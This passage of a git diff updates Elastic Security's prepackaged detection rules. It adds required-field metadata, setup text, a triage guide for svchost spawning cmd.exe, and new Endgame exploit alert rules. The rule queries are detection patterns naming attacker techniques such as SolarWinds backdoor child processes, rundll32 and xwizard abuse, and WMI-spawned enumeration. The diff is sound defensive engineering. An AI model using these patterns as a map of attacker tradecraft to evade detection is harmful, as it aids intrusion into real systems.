-{ - "author": [ - "Elastic" - ], - "description": "Elastic Endgame prevented Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", - "from": "now-15m", - "index": [ - "endgame-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "max_signals": 10000, - "name": "Process Injection - Prevented - Elastic Endgame", - "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:kernel_shellcode_event or endgame.event_subtype_full:kernel_shellcode_event)\n", - "risk_score": 47, - "rule_id": "990838aa-a953-4f3e-b3cb-6ddf7584de9e", - "severity": "medium", - "tags": [ - "Elastic", - "Elastic Endgame" - ], - "type": "query", - "version": 7 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_detected.json index 94534cf3a82c0..f890db4197f6e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_detected.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_detected.json @@ -13,6 +13,33 @@ "max_signals": 10000, "name": "Ransomware - Detected - Elastic Endgame", "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:ransomware_event or endgame.event_subtype_full:ransomware_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], "risk_score": 99, "rule_id": "8cb4f625-7743-4dfb-ae1b-ad92be9df7bd", "severity": "critical", @@ -21,5 +48,5 @@ "Elastic Endgame" ], "type": "query", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_prevented.json index 3f493d89a0ff7..4a2c08c917ea0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_prevented.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/endgame_ransomware_prevented.json @@ -13,6 +13,33 @@ "max_signals": 10000, "name": "Ransomware - Prevented - Elastic Endgame", "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:ransomware_event or endgame.event_subtype_full:ransomware_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "e3c5d5cb-41d5-4206-805c-f30561eae3ac", "severity": "high", @@ -21,5 +48,5 @@ "Elastic Endgame" ], "type": "query", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_abnormal_process_id_file_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_abnormal_process_id_file_created.json index b974250b93bc0..265b72866273b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_abnormal_process_id_file_created.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_abnormal_process_id_file_created.json @@ -20,6 +20,33 @@ "https://twitter.com/GossiTheDog/status/1522964028284411907", "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 43, "rule_id": "cac91072-d165-11ec-a764-f661ea17fbce", "severity": "medium", @@ -50,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_child_cmd_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_child_cmd_powershell.json index 418885c9d63f9..4e711ac5f49b5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_child_cmd_powershell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_child_cmd_powershell.json @@ -15,14 +15,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Command Execution via SolarWinds Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name: (\"cmd.exe\", \"powershell.exe\") and\nprocess.parent.name: (\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\"\n )\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20FILEWRITES%20(METHODOLOGY).ioc" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_unusual_child_processes.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_unusual_child_processes.json index 0cd9d99630b47..596d9322fd8f8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_unusual_child_processes.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_apt_solarwinds_backdoor_unusual_child_processes.json @@ -15,14 +15,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious SolarWinds Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name: (\"SolarWinds.BusinessLayerHost.exe\", \"SolarWinds.BusinessLayerHostx64.exe\") and\n not process.name : (\n \"APMServiceControl*.exe\",\n \"ExportToPDFCmd*.Exe\",\n \"SolarWinds.Credentials.Orion.WebApi*.exe\",\n \"SolarWinds.Orion.Topology.Calculator*.exe\",\n \"Database-Maint.exe\",\n \"SolarWinds.Orion.ApiPoller.Service.exe\",\n \"WerFault.exe\",\n \"WerMgr.exe\")\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", "https://github.com/mandiant/sunburst_countermeasures/blob/main/rules/SUNBURST/hxioc/SUNBURST%20SUSPICIOUS%20CHILD%20PROCESSES%20(METHODOLOGY).ioc" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "93b22c0a-06a0-4131-b830-b10d5e166ff4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -72,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_com_object_xwizard.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_com_object_xwizard.json index 15a2ef5d93a6e..20da6669c4f1a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_com_object_xwizard.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_com_object_xwizard.json @@ -12,14 +12,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution of COM object via Xwizard", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name : \"xwizard.exe\" and\n (\n (process.args : \"RunWizard\" and process.args : \"{*}\") or\n (process.executable != null and\n not process.executable : (\"C:\\\\Windows\\\\SysWOW64\\\\xwizard.exe\", \"C:\\\\Windows\\\\System32\\\\xwizard.exe\")\n )\n )\n", "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -54,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_prompt_connecting_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_prompt_connecting_to_the_internet.json index e5bef64a4c747..2db5758e008f8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_prompt_connecting_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_prompt_connecting_to_the_internet.json @@ -19,6 +19,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696", "severity": "low", @@ -62,5 +84,5 @@ } ], "type": "eql", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_svchost.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_svchost.json index 08e3c55610148..682247570fa31 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_svchost.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_svchost.json @@ -12,10 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Svchost spawning Cmd", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and \n not (process.pe.original_file_name : \"cmd.exe\" and process.args : (\n \"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\"))\n", + "note": "## Triage and analysis\n\n### Investigating Svchost spawning Cmd\n\nThe Service Host process (SvcHost) is a system process that can host one, or multiple, Windows services in the Windows\nNT family of operating systems. Note that `Svchost.exe` is reserved for use by the operating system and should not be\nused by non-Windows services.\n\nThis rule looks for the creation of the `cmd.exe` process with `svchost.exe` as its parent process. This is an unusual\nbehavior that can indicate the masquerading of a malicious process as `svchost.exe` or exploitation for privilege\nescalation.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and process.name : \"cmd.exe\" and\n not (process.pe.original_file_name : \"cmd.exe\" and process.args : (\n \"??:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat?\",\n \"?:\\\\Program Files\\\\Npcap\\\\CheckStatus.bat\",\n \"\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\silcollector.cmd\",\n \"\\\\system32\\\\AppHostRegistrationVerifier.exe\",\n \"\\\\system32\\\\ServerManagerLauncher.exe\"))\n", + "references": [ + "https://nasbench.medium.com/demystifying-the-svchost-exe-process-and-its-command-line-options-508e9114e747" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "fd7a6052-58fa-4397-93c3-4795249ccfa2", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -45,5 +76,5 @@ "timeline_title": "Comprehensive Process Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_unusual_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_unusual_process.json index 27ec0d952beaf..9da4b07502618 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_unusual_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_started_by_unusual_process.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent Process for cmd.exe", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"cmd.exe\" and\n process.parent.name : (\"lsass.exe\",\n \"csrss.exe\",\n \"epad.exe\",\n \"regsvr32.exe\",\n \"dllhost.exe\",\n \"LogonUI.exe\",\n \"wermgr.exe\",\n \"spoolsv.exe\",\n \"jucheck.exe\",\n \"jusched.exe\",\n \"ctfmon.exe\",\n \"taskhostw.exe\",\n \"GoogleUpdate.exe\",\n \"sppsvc.exe\",\n \"sihost.exe\",\n \"slui.exe\",\n \"SIHClient.exe\",\n \"SearchIndexer.exe\",\n \"SearchProtocolHost.exe\",\n \"FlashPlayerUpdateService.exe\",\n \"WerFault.exe\",\n \"WUDFHost.exe\",\n \"unsecapp.exe\",\n \"wlanext.exe\" )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -43,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_via_rundll32.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_via_rundll32.json index 5e5cdd317828a..d3dfebd6d8d5b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_via_rundll32.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_shell_via_rundll32.json @@ -15,10 +15,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Command Shell Activity Started via RunDLL32", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.name : (\"cmd.exe\", \"powershell.exe\") and\n process.parent.name : \"rundll32.exe\" and process.parent.command_line != null and\n /* common FPs can be added here */\n not process.parent.args : (\"C:\\\\Windows\\\\System32\\\\SHELL32.dll,RunAsNewUser_RunDLL\",\n \"C:\\\\WINDOWS\\\\*.tmp,zzzzInvokeManagedCustomActionOutOfProc\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "9ccf3ce0-0057-440a-91f5-870c6ad39093", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_virtual_machine.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_virtual_machine.json index 1292596404eff..d370b9115ce8e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_virtual_machine.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_command_virtual_machine.json @@ -14,15 +14,40 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Command Execution on Virtual Machine", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION\" and event.outcome:(Success or success)\n", "references": [ "https://adsecurity.org/?p=4277", "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", "https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-contributor" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "60884af6-f553-4a6c-af13-300047455491", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_defense_evasion_electron_app_childproc_node_js.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_defense_evasion_electron_app_childproc_node_js.json index 4bf6c272e59ae..1033700618ec9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_defense_evasion_electron_app_childproc_node_js.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_defense_evasion_electron_app_childproc_node_js.json @@ -17,6 +17,23 @@ "https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/", "https://nodejs.org/api/child_process.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "35330ba2-c859-4c98-8b7f-c19159ea0e58", "severity": "medium", @@ -62,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_detected.json new file mode 100644 index 0000000000000..0a08eeae69c55 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_detected.json @@ -0,0 +1,81 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame detected an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Exploit - Detected - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:exploit_event or endgame.event_subtype_full:exploit_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "2003cdc8-8d83-4aa5-b132-1f9a8eb48514", + "severity": "high", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Execution", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_prevented.json new file mode 100644 index 0000000000000..c75b34c9606eb --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_endgame_exploit_prevented.json @@ -0,0 +1,81 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame prevented an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Exploit - Prevented - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:exploit_event or endgame.event_subtype_full:exploit_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2863ffeb-bf77-44dd-b7a5-93ef94b72036", + "severity": "medium", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Execution", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_enumeration_via_wmiprvse.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_enumeration_via_wmiprvse.json index 29a0f88b271ea..dced3401dea99 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_enumeration_via_wmiprvse.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_enumeration_via_wmiprvse.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration Command Spawned via WMIPrvSE", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name:\n (\n \"arp.exe\",\n \"dsquery.exe\",\n \"dsget.exe\",\n \"gpresult.exe\",\n \"hostname.exe\",\n \"ipconfig.exe\",\n \"nbtstat.exe\",\n \"net.exe\",\n 